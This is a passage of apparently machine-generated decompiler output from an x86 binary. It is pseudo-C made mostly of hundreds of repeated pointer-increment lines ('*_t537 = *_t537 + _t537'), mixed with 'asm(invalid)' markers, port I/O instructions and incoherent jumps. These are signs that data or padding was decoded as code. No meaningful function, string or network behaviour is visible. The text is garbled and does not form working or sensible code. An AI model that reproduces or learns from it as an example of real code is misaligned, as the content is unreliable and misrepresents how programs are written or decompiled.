				_t518 = _t517 + 1;
				 *((intOrPtr*)(_t518 - 0x6f)) =  *((intOrPtr*)(_t518 - 0x6f)) + _t722;
				_t723 = _t722 + 1;
				 *_t518 =  *_t518 + _t518;
				 *_t518 =  *_t518 + _t518;
				 *((intOrPtr*)(_t518 + 0x7c)) =  *((intOrPtr*)(_t518 + 0x7c)) + _t723;
				_t519 = _t518 & 0x00000000;
				 *_t519 =  *_t519 + _t519;
				 *_t519 =  *_t519 + _t519;
				 *_t519 =  *_t519 + _t519;
				 *_t519 =  *_t519 + _t519;
				 *_t519 =  *_t519 + _t519;
				 *_t519 =  *_t519 + _t519;
				_t520 = _t519 + 1;
				 *_t723 =  *_t723 + _t520;
				 *_t741 =  *_t741 + _t723;
				 *_t520 =  *_t520 + _t723;
				_t521 = _t520 & 0x00000040;
				 *_t521 =  *_t521 + _t521;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t521 =  *_t521 + _t521;
				 *_t521 =  *_t521 + _t521;
				_t522 = _t521 + 1;
				 *((intOrPtr*)(_t522 + 0x4191)) =  *((intOrPtr*)(_t522 + 0x4191)) + _t723;
				while(1) {
					 *_t522 =  *_t522 + _t522;
					 *_t522 =  *_t522 + _t522;
					_pop(_t523);
					if( *_t522 <= 0) {
						 *_t523 =  *_t523 + _t523;
						 *_t523 =  *_t523 + _t523;
						 *_t523 =  *_t523 + _t523;
						 *_t523 =  *_t523 + _t523;
						 *_t523 =  *_t523 + _t523;
						 *_t523 =  *_t523 + _t523;
						 *((intOrPtr*)(_t523 + _t691 + 0x10040)) =  *((intOrPtr*)(_t523 + _t691 + 0x10040)) + _t691;
						_t523 = _t523 +  *_t523;
						 *0x40 =  *0x40 | _t523;
						 *_t523 =  *_t523 + _t523;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
					}
					 *_t523 =  *_t523 + 1;
					 *_t523 =  *_t523 + _t523;
					 *((intOrPtr*)(_t759 - 0x6fd7ffc0)) =  *((intOrPtr*)(_t759 - 0x6fd7ffc0)) + _t691;
					_t724 = _t723 + 1;
					 *_t523 =  *_t523 + _t523;
					 *_t523 =  *_t523 + _t523;
					_t524 = _t523 + _t691;
					if(_t524 < 0) {
						break;
					}
					 *_t524 =  *_t524 + _t524;
					 *_t524 =  *_t524 + _t524;
					 *_t524 =  *_t524 + _t524;
					 *_t524 =  *_t524 + _t524;
					 *_t524 =  *_t524 + _t524;
					 *_t524 =  *_t524 + _t524;
					_t522 = _t524 + _t741;
					asm("sbb [eax], al");
					_push(_t522);
					 *_t522 =  *_t522 + _t522;
					_t723 = _t724 + _t691;
					if(_t723 > 0) {
						continue;
					} else {
						asm("in al, dx");
						asm("sti");
						_t741 = 0x49;
						_t691 = _t691 - 1;
						_t767 = 0x17291d76;
						_t524 = _t522 - 0xce7a;
					}
					break;
				}
				asm("into");
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				asm("adc [ebx], al");
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				 *_t524 =  *_t524 + _t524;
				while(1) {
					 *_t524 =  *_t524 + _t524;
					 *_t524 =  *_t524 + _t524;
					 *_t524 =  *_t524 + _t524;
					 *_t524 =  *_t524 + _t524;
					 *_t524 =  *_t524 + _t524;
					 *_t524 =  *_t524 + _t524;
					 *((intOrPtr*)(_t691 + 1)) =  *((intOrPtr*)(_t691 + 1)) + _t724;
					 *_t524 =  *_t524 + _t524;
					_t524 = _t524 + _t691;
					asm("adc [eax], eax");
					_t767 = _t767 - 1;
					 *_t524 =  *_t524 + _t524;
					 *_t524 =  *_t524 + _t741;
					 *_t524 =  *_t524 + _t524;
					_t818 =  *_t524;
					if(_t818 > 0) {
						break;
					}
					if(_t818 > 0) {
						continue;
					} else {
						asm("in eax, 0xee");
						_t524 = _t524 - 0x83259b49;
						asm("a16 ja 0xffffffc4");
						asm("adc [eax], edx");
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *_t524 =  *_t524 + _t524;
						 *0x12b = _t524;
						 *_t524 =  *_t524 + _t524;
						 *((intOrPtr*)( &(_t750[0x10]) + _t524)) =  *((intOrPtr*)( &(_t750[0x10]) + _t524)) + _t724;
						 *((intOrPtr*)(_t524 + _t524 + 0x42560000)) =  *((intOrPtr*)(_t524 + _t524 + 0x42560000)) + _t691;
					}
					break;
				}
				 *((intOrPtr*)(_t758 + 0x42)) =  *((intOrPtr*)(_t758 + 0x42)) + _t741;
				_t525 = _t524 ^ 0x2a263621;
				 *_t525 =  *_t525 + _t525;
				 *_t525 =  *_t525 + _t525;
				 *_t525 =  *_t525 + _t525;
				 *_t525 =  *_t525 + _t525;
				 *_t525 =  *_t525 + _t525;
				 *_t525 =  *_t525 + _t525;
				 *_t758 =  *_t758 + _t691;
				 *_t525 =  *_t525 + _t525;
				 *_t525 =  *_t525 + _t525;
				 *_t525 =  *_t525 + _t525;
				 *_t525 =  *_t525 + _t525;
				 *_t525 =  *_t525 + _t525;
				 *_t525 =  *_t525 + _t525;
				_t527 = (_t525 |  *_t525) + 4;
				 *_t527 =  *_t527 + _t527;
				 *_t527 =  *_t527 + _t527;
				 *_t527 =  *_t527 + _t527;
				 *_t527 =  *_t527 + _t527;
				 *_t527 =  *_t527 + _t527;
				if( *_t527 >= 0) {
					_t673 = _t527 + 1;
					 *_t673 =  *_t673 + _t691;
					asm("clc");
					 *_t673 =  *_t673 ^ _t673;
					_t691 = _t691 + _t691;
					asm("invalid");
					 *_t673 =  *_t673 | _t673;
					 *_t673 =  *_t673 + _t673;
					 *_t673 =  *_t673 + _t673;
					 *_t673 =  *_t673 + _t673;
					_t527 = _t673 +  *_t673;
					 *_t527 =  *_t527 + _t527;
				}
				asm("sbb [eax], al");
				_t528 = _t527 + 1;
				 *((intOrPtr*)(_t724 + _t741 + 0x780040)) =  *((intOrPtr*)(_t724 + _t741 + 0x780040)) + _t741;
				 *_t528 =  *_t528 + _t528;
				_t529 =  *_t528;
				 *_t529 = _t528;
				 *_t529 =  *_t529 + _t529;
				_t530 = _t759;
				_t760 = _t529;
				 *_t530 =  *_t530 + _t530;
				 *_t758 =  *_t758 + _t741;
				 *_t530 =  *_t530 + _t530;
				 *_t530 =  *_t530 + _t530;
				 *_t530 =  *_t530 + _t530;
				 *_t530 =  *_t530 + _t530;
				 *_t530 =  *_t530 + _t530;
				 *_t530 =  *_t530 + _t530;
				 *_t530 =  *_t530 + _t530;
				_t176 = _t758 + 0x6f;
				 *_t176 =  *((intOrPtr*)(_t758 + 0x6f)) + _t530;
				if( *_t176 < 0) {
					L56:
					 *_t530 =  *_t530 + _t530;
					 *((intOrPtr*)(_t741 + _t691 + 0x10040)) =  *((intOrPtr*)(_t741 + _t691 + 0x10040)) + _t741;
					 *_t530 =  *_t530 + _t530;
					goto L57;
				} else {
					_pop(_t751);
					_t530 = _t530 - 1;
					_t724 = _t724 + 1;
					_push(_t758);
					_t750 = _t751 + 1;
					_push(_t760);
					_t767 = _t767 - 1 + 1;
					_t741 = _t741 + 1;
					_t178 = _t758 + 0x6f;
					 *_t178 =  *((intOrPtr*)(_t758 + 0x6f)) + _t530;
					if( *_t178 < 0) {
						L58:
						 *_t530 =  *_t530 + _t530;
						 *_t530 =  *_t530 + _t530;
						 *((intOrPtr*)(_t530 + 0x100401a)) =  *((intOrPtr*)(_t530 + 0x100401a)) + _t691;
						 *_t530 =  *_t530 + _t530;
						 *((intOrPtr*)(_t741 + _t691 + 0x40)) =  *((intOrPtr*)(_t741 + _t691 + 0x40)) + _t691;
					} else {
						_pop(_t750);
						_t767 = _t767 + 1;
						_t760 =  *(_t691 + 0x6b) * 0x726f7265;
						 *[ss:eax] =  *[ss:eax] + _t530;
						_t758 = _t758 + 1;
						asm("outsd");
						if(_t758 >= 0) {
							_pop(_t750);
							_t760 =  *(_t691 + 0x6b) * 0x726f7265;
							 *[ss:eax] =  *[ss:eax] + _t530;
							 *_t530 =  *_t530 + _t530;
							 *_t530 =  *_t530 + _t530;
							 *_t530 =  *_t530 + _t530;
							 *0x40 =  *0x40 | _t530;
							 *_t530 =  *_t530 + _t530;
							_pop(_t767);
							_t737 = _t724 + 1;
							_t691 = _t691 + _t691;
							asm("invalid");
							 *_t530 =  *_t530 + 1;
							 *_t530 =  *_t530 + _t530;
							 *((intOrPtr*)(_t760 - 0x6febffc0)) =  *((intOrPtr*)(_t760 - 0x6febffc0)) + _t737;
							_t724 = _t737 + 1;
							 *_t530 =  *_t530 + _t530;
							 *_t530 =  *_t530 + _t530;
							 *_t530 =  *_t530 + _t691;
							if( *_t530 >= 0) {
								 *_t530 =  *_t530 + _t530;
								 *_t530 =  *_t530 + _t530;
								 *_t530 =  *_t530 + _t530;
								 *_t530 =  *_t530 + _t530;
								 *_t530 =  *_t530 + _t530;
								 *_t530 =  *_t530 + _t530;
								 *((intOrPtr*)(_t741 + _t691 + 0x10040)) =  *((intOrPtr*)(_t741 + _t691 + 0x10040)) + _t741;
								 *_t530 =  *_t530 + _t530;
								 *_t750 =  *_t750 ^ _t741;
								_t530 = _t530 + 1;
								 *_t530 =  *_t530 + _t530;
								goto L56;
							}
							L57:
							 *((intOrPtr*)(_t741 + _t691 + 0x40)) =  *((intOrPtr*)(_t741 + _t691 + 0x40)) + _t691;
							goto L58;
						}
					}
				}
				 *_t530 =  *_t530 + _t530;
				_t750[0x1b001a00] = _t750[0x1b001a00] + _t741;
				_t531 = _t530 + _t530;
				asm("sbb al, [eax]");
				asm("in al, 0x9d");
				_t725 = _t724 + 1;
				 *_t531 =  *_t531 + _t531;
				 *_t531 =  *_t531 + _t531;
				 *((intOrPtr*)(_t531 + 0x1e)) =  *((intOrPtr*)(_t531 + 0x1e)) + _t691;
				asm("daa");
				 *((intOrPtr*)(_t531 + 0x37)) =  *((intOrPtr*)(_t531 + 0x37)) + _t531;
				_t532 = _t531 + 1;
				 *((intOrPtr*)(_t532 + 0x37)) =  *((intOrPtr*)(_t532 + 0x37)) + _t741;
				_t533 = _t532 + 1;
				 *_t533 =  *_t533 + _t533;
				_pop(ds);
				 *((intOrPtr*)(_t533 + _t533)) =  *((intOrPtr*)(_t533 + _t533)) + _t741;
				 *_t533 =  *_t533 + _t533;
				asm("insb");
				asm("das");
				_t534 = _t533 + 1;
				_t692 = _t691 + _t691;
				asm("invalid");
				 *_t534 =  *_t534 + 1;
				 *_t534 =  *_t534 + _t534;
				 *_t534 =  *_t534 + _t534;
				 *_t534 =  *_t534 + _t534;
				_t535 = _t534 + _t534;
				asm("sbb al, [eax]");
				asm("lock pop ebx");
				 *_t535 =  *_t535 & _t535;
				if( *_t535 >= 0) {
					_t671 = _t535 + 1;
					_t692 = _t692 + _t692;
					asm("invalid");
					 *_t671 =  *_t671 + 1;
					 *_t671 =  *_t671 + _t671;
					 *((intOrPtr*)(_t741 + _t692 + 0x1a3c0040)) =  *((intOrPtr*)(_t741 + _t692 + 0x1a3c0040)) + _t692;
					_t672 = _t671 + 1;
					 *((intOrPtr*)(_t672 - 0x71ffbfef)) =  *((intOrPtr*)(_t672 - 0x71ffbfef)) + _t725;
					asm("adc [eax], eax");
					_t535 = _t767;
					_t767 = _t672;
					asm("adc [eax], eax");
					 *_t535 =  *_t535 + _t535;
					 *_t535 =  *_t535 + _t535;
					 *_t535 =  *_t535 + _t535;
					 *_t535 =  *_t535 + _t535;
					 *_t535 =  *_t535 + _t535;
					 *_t535 =  *_t535 + _t535;
					 *_t535 =  *_t535 + _t535;
					 *_t535 =  *_t535 + _t535;
					 *_t535 =  *_t535 + _t535;
				}
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				 *_t535 =  *_t535 + _t535;
				_t536 = _t535 + _t741;
				 *_t536 =  *_t536 + _t536;
				 *_t536 =  *_t536 + _t725;
				_t537 = _t536 & 0x00000040;
				 *_t537 =  *_t537 + _t537;
				asm("pushad");
				 *_t725 =  *_t725 + 0x70;
				 *_t725 =  *_t725 + 0x34;
				asm("sbb al, 0x0");
				 *_t537 =  *_t537 + _t537;
				 *((intOrPtr*)(_t741 + 0x4011)) =  *((intOrPtr*)(_t741 + 0x4011)) + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *((intOrPtr*)(_t692 + _t741 + 0x60040)) =  *((intOrPtr*)(_t692 + _t741 + 0x60040)) + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *_t537 =  *_t537 + _t537;
				 *0x40 =  *0x40 | _t537;
				 *_t537 =  *_t537 + _t537;
				asm("pushfd");
				_t693 = _t692 + _t692;
				asm("invalid");
				 *_t537 =  *_t537 + 1;
				 *_t537 =  *_t537 + _t537;
				 *((intOrPtr*)(0x40 + _t760)) =  *((intOrPtr*)(0x40 + _t760)) + _t693;
				 *_t537 =  *_t537 + _t537;
				_t728 = _t725 + 3;
				 *_t750 =  *_t750 + _t741;
				 *_t537 =  *_t537 + _t537;
				 *((intOrPtr*)(_t537 + 0x6100401f)) =  *((intOrPtr*)(_t537 + 0x6100401f)) + _t741;
				 *_t537 =  *_t537 + _t537;
				 *((intOrPtr*)(_t693 + _t728 * 4)) =  *((intOrPtr*)(_t693 + _t728 * 4)) + _t537;
				 *[es:esi+ebx] =  *[es:esi+ebx] + _t728;
				_t538 = _t537 + 1;
				 *_t728 =  *_t728 + _t538;
				 *_t538 =  *_t538 + _t538;
				_t540 = _t538 + _t538 + 1;
				 *_t540 =  *_t540 + _t540;
				 *_t540 =  *_t540 + _t540;
				 *_t540 =  *_t540 + _t728;
				_t541 = _t540 + 1;
				 *_t728 =  *_t728 + _t541;
				 *_t541 =  *_t541 + _t541;
				 *_t541 =  *_t541 + _t741;
				_t542 = _t541 + 1;
				 *_t542 =  *_t542 + _t542;
				 *_t542 =  *_t542 + _t542;
				 *_t542 =  *_t542 + _t741;
				 *_t542 =  *_t542 & _t542;
				_pop(es);
				 *_t542 =  *_t542 + _t542;
				 *_t542 =  *_t542 + _t741;
				 *_t741 =  *_t741 + _t741;
				_t750[0x1b001a00] = _t750[0x1b001a00] + _t741;
				 *_t728 =  *_t728 + _t728;
				_t545 = _t542 + 2 + _t728;
				asm("movsb");
				 *_t545 =  *_t545 + _t545;
				 *_t545 =  *_t545 + _t545;
				 *((intOrPtr*)( &(_t750[0x42d8009]) + _t767)) =  *((intOrPtr*)( &(_t750[0x42d8009]) + _t767)) + _t741;
				asm("popfd");
				_t730 = _t728 + 2;
				 *((intOrPtr*)(_t741 + _t758)) =  *((intOrPtr*)(_t741 + _t758)) + _t741;
				_t548 = _t545 + 1 + _t741 + 1;
				 *((intOrPtr*)(_t741 + _t758)) =  *((intOrPtr*)(_t741 + _t758)) + _t548;
				_t549 = _t548 + 1;
				 *((intOrPtr*)(_t741 + _t758 + 0x40)) =  *((intOrPtr*)(_t741 + _t758 + 0x40)) + _t549;
				 *((intOrPtr*)(_t549 + 0x32)) =  *((intOrPtr*)(_t549 + 0x32)) + _t693;
				_t550 = _t549 + 1;
				 *((intOrPtr*)(_t550 + _t741 + 0x10c20040)) =  *((intOrPtr*)(_t550 + _t741 + 0x10c20040)) + _t693;
				_t551 = _t550 + 1;
				 *((intOrPtr*)(_t741 + _t758 + 0x40)) =  *((intOrPtr*)(_t741 + _t758 + 0x40)) + _t693;
				 *((intOrPtr*)(_t741 + _t758 + 0x10c80040)) =  *((intOrPtr*)(_t741 + _t758 + 0x10c80040)) + _t551;
				 *((intOrPtr*)(_t758 + _t760 + 0x32a80040)) =  *((intOrPtr*)(_t758 + _t760 + 0x32a80040)) + _t741;
				asm("adc [eax], al");
				asm("aam 0x10");
				_t554 = _t551 + 3;
				asm("adc [eax], al");
				asm("cld");
				 *_t554 =  *_t554 ^ _t554;
				asm("int3");
				asm("loopne 0x12");
				asm("loopne 0x34");
				_t559 = ((_t554 ^  *_t554) + 0x00000001 + _t693 ^  *((_t554 ^  *_t554) + 1 + _t693)) + 1;
				_t744 = _t730 + _t741 + _t693 + _t559;
				asm("adc [eax], al");
				asm("cld");
				asm("adc al, 0x33");
				_t561 = (_t559 ^  *_t559) + 1;
